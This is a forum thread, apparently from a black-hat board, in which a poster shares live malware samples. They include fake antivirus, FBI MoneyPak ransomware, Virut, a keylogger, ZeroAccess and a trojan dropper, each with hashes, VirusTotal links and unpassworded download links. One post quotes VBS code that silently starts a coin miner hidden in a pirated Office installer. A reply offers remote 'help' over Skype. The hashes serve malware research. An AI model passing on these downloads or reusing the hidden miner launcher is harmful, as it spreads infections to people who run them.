[1nT0x!c@t3d]

Here Is the first submission.

this particular fake AV runs "windows custom security"
Virus Total:
SHA256: 700873063400fea27c2c4ccdf66d329a478d0fc8a2bad18a48de3019c0707544
File name: FAKEA-RM.00D
Detection ratio: 33 / 42
Analysis date: 2012-06-18 04:32:37 UTC ( 3 months, 1 week ago )

download here:
http://www.filedropper.com/windowscustomsafety
or here:
http://www.filehosting.org/file/details/..._Safety.7z

dropbox link:
http://dl.dropbox.com/u/2690780/Test1/Wi...0Safety.7z

file is in a 7zip package with no password

please let me know which file hosting services you guys prefer / and or are better than the ones i provided

[1nT0x!c@t3d]

FBI Money Pack Varients
scanned at virus total.com
sample 1
File: FBI.Moneypack[easymode].7z
SHA256: 601f0b9e412a17c693a2ab8d3a4a34a9cf72c9d4f4f55909adfd2fff1f5762a6
SHA1: afad0d6a6acab63c450e33419f4291aadf2dac25
MD5: 7479dbb508c6c96ae44892b9d0c3f6da
File size: 59.4 KB ( 60775 bytes )
File name: msiiexx.exe
File type: Win32 EXE
Detection ratio: 34 / 43
Analysis date: 2012-09-25 23:42:59 UTC ( 0 minutes ago )

download:
https://multiupload.biz/taluszmf2z56/FBI...iz.7z.html


second submission:
FBI.Moneypack_Trojan.Winlock.6412.7z
SHA256: 739ee618037525295ea79ac28c4a05e856f01265f1be5d8e2283a0c15415039d
SHA1: 86c189c09962b5d38e7deebf112c7ecdefaa5db4
MD5: c0fb09a30dc4873e1806bfd317984de1
File size: 207.4 KB ( 212335 bytes )
File name: C0FB09A30DC4873E1806BFD317984DE1
File type: Win32 EXE
Tags: peexe
Detection ratio: 32 / 41
Analysis date: 2012-09-15 01:33:09 UTC ( 1 week, 3 days ago )

download
https://multiupload.biz/vzdcy49ittig/FBI...iz.7z.html

no password protection.

[Dismas]

I'd totally ask you for a virus scan, but that'd be rather foolish of me.

[1nT0x!c@t3d]

This Pack is mostly Virut samples. 6 nasty infections with reports
1.
SHA256: 3370da9f22ccddf5760d0f3121e1f04ca474f96d2ed1e8c6f4649579b875ddba
SHA1: 0dc326f35d4845b93b3cf84f729f156b2b675fe5
MD5: 7fbb667dc99fe958728da2e41fef3097
File size: 60.5 KB ( 61952 bytes )
File name: 7hyyhnwf.exe
File type: Win32 EXE
Detection ratio: 39 / 43
Analysis date: 2012-09-28 00:44:59 UTC ( 0 minutes ago )

https://www.virustotal.com/file/3370da9f...348793099/

2.
SHA256: 59c4b704b5cd1198a1f6072862a57771012844b01033024fd26b8ba0f26f1cc0
SHA1: 23b77bd92d9aa1e2bffbf160e6dbf85c227a95aa
MD5: 13b2e871bd7ee15f4078ce49819ad6fd
File size: 76.0 KB ( 77824 bytes )
File name: ChCfg.exe
File type: Win32 EXE
Detection ratio: 36 / 43
Analysis date: 2012-09-28 00:47:29 UTC ( 0 minutes ago )

https://www.virustotal.com/file/59c4b704...348793249/

3.
SHA256: e749cec198c519190b302dc8c12fb600b12039dcbadb7787ad0957df6727892f
SHA1: 7280e0537eec3ee2dda5e4bf6388d687fd0fa6dc
MD5: 72ff9b27d404bbf19c037074bbffee6e
File size: 74.8 KB ( 76564 bytes )
File name: ex3cv9vb.exe
File type: Win32 EXE
Detection ratio: 39 / 43
Analysis date: 2012-09-28 00:50:25 UTC ( 0 minutes ago )

https://www.virustotal.com/file/e749cec1...348793425/

4.
SHA256: 728414dc574a72f1e2986ad844996e81c9a633d2a4936fefd20b5b4d4da41dc8
SHA1: bc99f90656e6cee8d5afee885173897e7e50badb
MD5: 86beebf5f131cf54a6b939a14efb893a
File size: 67.0 KB ( 68608 bytes )
File name: f1ku.exe
File type: Win32 EXE
Detection ratio: 38 / 42
Analysis date: 2012-09-28 00:52:28 UTC ( 1 minute ago )

https://www.virustotal.com/file/728414dc...348793548/

5.
SHA256: 4dc2d07f5aed19c3c7deff2fbe50f5bb01fd80d7a3eeb25acd881def804c60fd
SHA1: 9631baa5c2e8544bed49c26f38fd71972b4d94eb
MD5: be7dcbd8c94da312986204957a93be61
File size: 128.5 KB ( 131584 bytes )
File name: 599E8A7E002F01A502C40287528D9100A7C10CFE.exe
File type: Win32 EXE
Detection ratio: 30 / 43
Analysis date: 2012-01-24 20:19:23 UTC ( 8 months, 1 week ago )

https://www.virustotal.com/file/4dc2d07f.../analysis/
6.
SHA256: c4d9284cdd05f66f8654f26b72bff52b8473d380a6cb84ee95990c899ec44e23
SHA1: 4d1728bc5c69f342f7cfb9dd813ed288cddf9d4a
MD5: f225e8d9294f57dd27dd5e777ac50012
File size: 63.0 KB ( 64516 bytes )
File name: v9mibx34.exe
File type: Win32 EXE
Detection ratio: 37 / 41
Analysis date: 2012-09-28 00:55:42 UTC ( 1 minute ago )

https://www.virustotal.com/file/c4d9284c...348793742/

download link:
http://www.filehosting.org/file/details/...ections.7z

7zip file, no pw.

[1nT0x!c@t3d]

here is the first wild sample i have seen of an infection turning your computer into a bitcoin minor.

this torrent:
http://www.torrentfunk.com/torrent/48291...teflu.html
will install ms office 2k13 preview, however it will also install start up entry called "windowsexplorer.exe" aimed at a new directory

C:\program files\windowsupdates\ or
C:\program files (x86)\windowsupdates\

with many vbs scripts and a executable "officestarter2013.exe" it will attempt to use up to 10 threads on your machine strictly for bitcoin mining.

here is a sample of the vbs code
"Set WshShell = CreateObject("Wscript.Shell")
MSG_String = "OfficeStarter2013.exe --url http://litecoinpool.org:9332/ --userpass rackz.2:2 --threads 10 --quiet"
Ret = WshShell.Run(MSG_String,0,False)
"
none of the files in question are keyloggers as i first suspected. they pass all the virustotal scans
as such i won't include the scan logs since there aren't any for "officestarter2013.exe"

the ms office 2k13 is however legit and will install. the keys provided won't work anymore but the 29 day trial will. you can easily see the infected files by using 7zip to extract the "Microsoft Office 2013 Professional Plus x64.exe" or "Microsoft Office 2013 Professional Plus x86" to a new directory. you will then see a "windows updates.exe" which further extracts to the files in question

here is an upload:
http://www.filehosting.org/file/details/...sUpdate.7z

7zip file with no PW.
use at your own risk

[1nT0x!c@t3d]

-----Algerian Keylogger------
These samples will create outbound connections to to following IP
http://en.utrace.de/ip-address/197.207.211.109

Here are the VT logs:

https://www.virustotal.com/file/2c5cfa14.../analysis/

files are in the 7zip folder and as always are NOT password protected

Proceed at your own risk.

http://www.filehosting.org/file/details/...tre.SCR.7z

---

--- Rootkit.ZeroAccess-----
One of the nastier Pieces of malware out there.
MBAM identifies it as Rootkit.0Access.

here are the VT Logs (30 / 43)

https://www.virustotal.com/file/41bf3766.../analysis/

download here:
http://www.filehosting.org/file/details/..._Access.7z

file is in a 7zip container with NO password.
user discretion is advised.

[Phytrix]

I think I got this malware . Someone could help me removing it ,please?

I can help you with this. Simply PM me with your Skype and I'll add you, then we can get on TV.

[rattlesnaketm]

Can be found on almost every bh form but thanks for share anyway :blackhat:

I think I got this malware . Someone could help me removing it ,please?

And what to say on that lul

[1nT0x!c@t3d]

Win 7 total Security + Zero Access

as of 01/15/13 none of the samples are identified by MBAM!
when i first uploaded these samples, VT had not seen them before, but correctly
identified them.

so here it is AF, a VT first just for you.

the three offenders in the 7zip are:

1. https://www.virustotal.com/file/6213ad5b.../analysis/

2. https://www.virustotal.com/file/cd4cd138.../analysis/

3. https://www.virustotal.com/file/2020357b.../analysis/

as always the files are in an unprotected 7zip file,
no PW.
user discretion advised.

http://www.filehosting.org/file/details/...oAccess.7z

[1nT0x!c@t3d]

I was looking for a way to change the themes in chrome when i came across this gem. my buddy is a chrome fanboy and thought he could find a quick way to change the themes and then send me a link to this program. 3 out of the 4 files in question are heavily infected while the "xchrome.exe" checks out as safe from all sources it is probably just heavily encrypted

VT
1
https://www.virustotal.com/en/file/ca30c.../analysis/
2
https://www.virustotal.com/en/file/36b4b.../analysis/
3
https://www.virustotal.com/en/file/0eb4e.../analysis/
4
https://www.virustotal.com/en/file/aaa53.../analysis/




files:
XChromeP3.Trojan-Dropper.Win32.Agent.7z
download:
http://www.filehosting.org/file/details/...2.Agent.7z

files are in a zip fie container with NO PASSWORD.
proceed at your own risk.